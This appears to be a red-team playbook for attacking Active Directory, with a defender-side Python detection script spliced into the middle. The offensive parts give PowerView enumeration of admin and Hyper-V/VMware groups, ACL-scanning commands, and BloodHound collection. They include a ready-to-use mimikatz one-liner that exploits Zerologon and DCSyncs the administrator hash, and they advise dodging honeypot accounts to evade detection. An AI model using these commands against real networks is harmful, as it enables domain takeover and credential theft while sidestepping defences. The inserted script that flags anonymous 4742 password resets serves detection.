To identify which AD groups have admin rights to which computers:

Get-NetGPOGroup
Get-NetGPOGroup -GroupName "Local Admin"

Virtual admins (VMware admins and Hyper-V admins) are often groups in AD with full admin access, so owning one of these groups can sometimes mean owning the whole environment.

Get-NetGroup "*Hyper*" | Get-NetGroupMember 
Get-NetGroup "*VMWare*" | Get-NetGroupMember

Look for misconfigured ACLs and permissions on user objects that could allow attacks such as DCSync.

Run SharpHound on all machines to collect data, then import it into BloodHound to enumerate and visualize the results. Make sure you also mark every user you have compromised as owned.

Check whether the system is vulnerable to Zerologon, but remember that with certain policies in place it can be hard to complete the hash gathering, because the environment may have scripts or similar mechanisms that revert the machine account password.


mimikatz "lsadump::Zerologon /target:DCName /account:DCName$ /null /ntlm /exploit" "lsadump::dcsync /domain:Domain.local /dc:DCName /user:administrator /authuser:DCName$ /authdomain:Domain /authpassword: /authntlm" "exit"

Alternatively, Impacket can be used to exploit it.
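A defender-side check for the Zerologon step above, added here as an example and not part of the original notes: scan Security-log 4742 ("A computer account was changed") records for an anonymous subject (SID S-1-5-7) resetting a domain controller's machine account password, which is the footprint a null-password reset leaves. The event records and DC names are constructed samples, not captured logs.

```python
"""Flag 4742 events consistent with a Zerologon-style machine-account reset."""

ANONYMOUS_LOGON_SID = "S-1-5-7"  # well-known SID for ANONYMOUS LOGON

# Constructed sample records in the field layout of Security event 4742.
# "PasswordLastSet" is the Changed Attributes value; "-" means unchanged.
SAMPLE_EVENTS = [
    {"EventID": 4742, "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "DC01$", "PasswordLastSet": "2020-09-14 10:02:11"},
    # routine 30-day machine password rotation performed by the DC itself
    {"EventID": 4742, "SubjectUserSid": "S-1-5-18", "SubjectUserName": "DC01$",
     "TargetUserName": "DC01$", "PasswordLastSet": "2020-09-14 03:00:00"},
    # helpdesk editing a workstation object without touching its password
    {"EventID": 4742, "SubjectUserSid": "S-1-5-21-1-2-3-1105", "SubjectUserName": "helpdesk",
     "TargetUserName": "WS07$", "PasswordLastSet": "-"},
    # anonymous logon that is not an account change at all
    {"EventID": 4624, "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "DC01$"},
]


def is_machine_account(name: str) -> bool:
    """Computer accounts in AD carry a trailing '$' in sAMAccountName."""
    return name.endswith("$")


def zerologon_indicators(events, dc_names):
    """Return the 4742 records where ANONYMOUS LOGON changed the password of
    one of the given domain controllers' machine accounts."""
    dcs = {name.rstrip("$").upper() for name in dc_names}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4742:
            continue
        target = ev.get("TargetUserName", "")
        if not is_machine_account(target):
            continue
        anonymous = ev.get("SubjectUserSid") == ANONYMOUS_LOGON_SID
        password_changed = ev.get("PasswordLastSet", "-") != "-"
        if anonymous and password_changed and target.rstrip("$").upper() in dcs:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for hit in zerologon_indicators(SAMPLE_EVENTS, ["DC01"]):
        print(f"ALERT: {hit['SubjectUserName']} reset password of {hit['TargetUserName']}")
```

Feed it the 4742 records exported from the DC's Security log (for example via Get-WinEvent) and the list of your domain controllers; a hit after the environment's password-revert scripts have run is still worth investigating, since the revert itself does not remove the anonymous 4742 record.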

Custom Domain/OU Delegations:

Check for misconfigurations in the ACLs and see whether computer objects have misconfigured ACL rights. PowerView can be used for this.

Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}

Invoke-ACLScanner   # for all principals
# for the current user only
Invoke-ACLScanner | Where-Object {$_.IdentityReference -eq [System.Security.Principal.WindowsIdentity]::GetCurrent().Name}

To avoid decoys and honeypots, a good idea is to check the logon counts on the machines; if there are any stale accounts, try to avoid them, as they can be traps.